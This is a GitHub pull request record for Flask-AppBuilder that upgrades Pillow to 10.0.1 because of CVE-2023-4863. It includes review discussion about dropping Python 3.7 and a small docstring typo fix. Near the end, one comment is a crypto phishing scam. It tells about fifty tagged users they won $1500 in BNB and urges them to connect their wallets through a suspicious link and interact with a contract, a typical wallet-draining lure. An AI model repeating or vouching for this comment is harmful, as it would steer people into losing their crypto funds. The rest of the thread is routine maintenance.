### PR TITLE
chore: Upgrade to Pillow 10.0.1

### PR DESCRIPTION
**Pull request by Dosenpfand**
### Description

Pillow < 10.0.1 is affected by CVE-2023-4863, see https://pillow.readthedocs.io/en/stable/releasenotes/10.0.1.html .

### ADDITIONAL INFORMATION

- [ ] Has associated issue:
- [ ] Is CRUD MVC related.
- [ ] Is Auth, RBAC security related.
- [ ] Changes the security db schema.
- [ ] Introduces new feature
- [ ] Removes existing feature

### CODE REVIEW

**Comment by Dosenpfand** [comment]
The reason for the failed CI runs is that Pillow >=10.0 only supports Python >= 3.8 but these CIs use Python 3.7.
What to do here? Keep using a vulnerable and unmaintained version of Pillow, clearly seems like not a solution.

**Comment by dpgaspar** [comment]
> The reason for the failed CI runs is that Pillow >=10.0 only supports Python >= 3.8 but these CIs use Python 3.7. What to do here? Keep using a vulnerable and unmaintained version of Pillow, clearly seems like not a solution.

True, python 3.7 has reached it's EOL, so it's time to drop it and support 3.11

**Comment by Dosenpfand** [comment]
> True, python 3.7 has reached it's EOL, so it's time to drop it and support 3.11

Good point. I opened #2147 to do just that.

**Comment by dpgaspar** [comment]
Thank you once more for #2147, let's bring this one in also

File: flask_appbuilder/filemanager.py [hunk 1]
```diff
@@ -207,16 +207,16 @@ def resize(self, image, size):
             Resizes the image
 
             :param image: The image object
-            :param size: size is PIL tuple (width, heigth, force) ex: (200,100,True)
+            :param size: size is PIL tuple (width, heighth, force) ex: (200,100,True)
```
Comment (dpgaspar) [inline flask_appbuilder/filemanager.py:210]: heighth -> height

Comment (Dosenpfand) [reply flask_appbuilder/filemanager.py]: Fixed.

**Comment by dpgaspar** [comment]
Looks good to me after the conflict is fixed

**Comment by Dosenpfand** [comment]
@dpgaspar Conflicht should be fixed now.

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[Claim Now](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @ckwsens, @Aakash2-2, @ayushmankumar7, @dinorain, @fgaurat, @aydashahin, @FeeeeK, @Nerio-io, @donatin48, @j4go, @alptekinnege, @anproghub, @nitinthewiz, @bachtran, @mmahdibarghi, @wjnbreu, @bislara, @BillBai, @janinekhuc, @raulcorreia7, @eu09, @KingPin, @vovavili, @rszamszur, @tephyr, @nersis81, @kyeser, @arhoonio, @XuxuGhis, @EgorVoron, @Draykee, @asteppke, @endast, @xiangyangkan, @ahmadassaf, @gerasim13, @cs-fedy, @anikfal, @josuedjh3, @totallynotdavid, @VegaDeftwing, @beskep, @hartca, @yanel, @TaylanTatli, @aaronlks, @secantsquared, @FBruzzesi, @rogall-e, @flavienbwk

**Review by dpgaspar — APPROVED** [review]

**Pull request merged**